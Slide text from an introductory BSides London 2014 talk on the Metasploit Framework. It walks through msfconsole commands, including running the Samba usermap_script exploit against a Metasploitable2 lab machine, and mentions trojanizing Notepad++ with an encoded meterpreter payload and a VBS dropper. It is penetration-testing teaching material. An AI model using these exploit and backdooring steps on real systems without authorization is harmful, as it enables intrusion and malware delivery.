Metasploit: You can look like Hugh Jackman too!

BSides London 2014

BSides London 2014

Subjects

• What is the Metasploit Framework (MSF)?

• How can I use MSF to my advantage?

• Why would I want to use MSF?

• Last but not least: How DO I actually use MSF?

Terminology

• MSF

• Vulnerabilities

• Exploits

• Payloads

Metasploit trough the ages

• Started out as a ncruses based network game written in Perl

• 2003: MSF 1.0 released (11 exploits)

• Somewhere along the way.. v3.0 written in Ruby

• 2014: MSF 4.9 (1292 exploits)

Inside the box• +1200 exploits

• 700 auxiliary modules

• +200 post modules

• +300 payloads

• +30 encoders

• 8 nops

Sounds AMAZING Mike! How do I get it?

• rapid7.com

• github.com/rapid7

• kali.org

And now for something completely different…

Running the Metasploit Framework

From Kali Linux

binary.hybrid3.iso• md5: 058226e666c98e9e094318247ddb5e2c

• sha1: 40ebcbe6487d567f55747a219b426b4e62b4995c

• 32-bits

• Kali 1.0.6

• Metasploit 4.9.2-2014042301

• root/toor

metasploitable-linux-2.0.0.zip

• md5: 058226e666c98e9e094318247ddb5e2c

• sha1: 8825f2509a9b9a58ec66bd65ef83167f

• msfadmin/msfadmin

Virtualbox Configuration

Interacting with MSF• # msfcli

• # msfconsole

!

• out-of-scope: msfweb/msfgui

• out-of-scope: Armitage

• out-of-scope: Cobalt Strike

Starting MSF from Kali

msfconsole 101

• msf > version

• msf > banner

• msf > db_status

• msf > help (!!)

msfconsole basics• msf > search -h

• msf > info searchresult

• msf > use searchresult

• msf auxiliary(searchresult) > show actions

• msf exploit(searchresult) > show options

• msf auxiliary(totallynotwhereIwanttobe) > back

<3

And now.. for something completely different!

• Open Source Security Testing Methodology Manual (OSSTM)

• Information Systems Security Assessment Framework (ISSAF)

• Penetration Testing Execution Standard (PTES)

• Open Web Application Security Project (OWASP top 10)

• SANS (20 Critical Controls)

Penetration Testing stages• Information gathering

• Identifying threats

• Identifying vulnerabilities

• Exploiting vulnerabilities

• Post exploitation

Let’s get to it..

msfconsole 102

• msf > info exploit/multi/handler

• msf > use exploit/multi/handler

• msf exploit(handler) > info

• msf exploit(handler) > show options

• msf exploit(handler) > set variable

msfconsole 10..3?

• variables are set with set

• variables can be removed with unset

• global variables can be set with setg

• variabelen can be saved to ~/.msf4/config with save

MSF Jobs & Sessions

• Exploits = jobs

• Payloads = sessions

• msf > help sessions

MSF Jobs & Sessions

• use back to navigate back to the framework

• use background to suspend a meterpreter session

• msf > jobs -l (list all currently active jobs)

• msf > jobs -i x (interact with job nr. x)

Attack Vectors

• Server-side

• Client-side

Server-side

• msf > db_nmap target-ip

• msf > hosts

• msf > services

metasploitable2• msf > info exploit/multi/samba/usermap_script

• msf > use exploit/multi/samba/usermap_script

• exploit (usermap_script) > show options

• exploit (usermap_script) > set RHOST 172.x.x.x

• exploit (usermap_script) > set RPORT 445

• exploit (usermap_script) > check (niet alle exploits ondersteunen deze functie)

• exploit (usermap_script) > exploit

Metasploitable2

Ok, great! What now?

• msf > search post/linux

msfpayload

msfpayload

Why?

notepad++ + meterpreter

notepad++ + meterpreter + 99 iterations

notepad++ + meterpreter + 999 iterations

VB… what?!

pwnage

Notepad++ + meterpreter + VBS

Recap

• What is the Metasploit Framework (MSF)?

• How can I use MSF to my advantage?

• Why would I want to use MSF?

Victory Dance

Questions?

Ok, not bad.. How can I continue?!• http://blog.ctf365.com/metasploitable-in-the-cloud/

• http://r-7.co/Metasploitable2

• http://vulnhub.com

• Be aware of browser exploits!

• Be aware of QR codes!!

• Be aware of ALL THE THINGS!!!

Thank you all and until next year!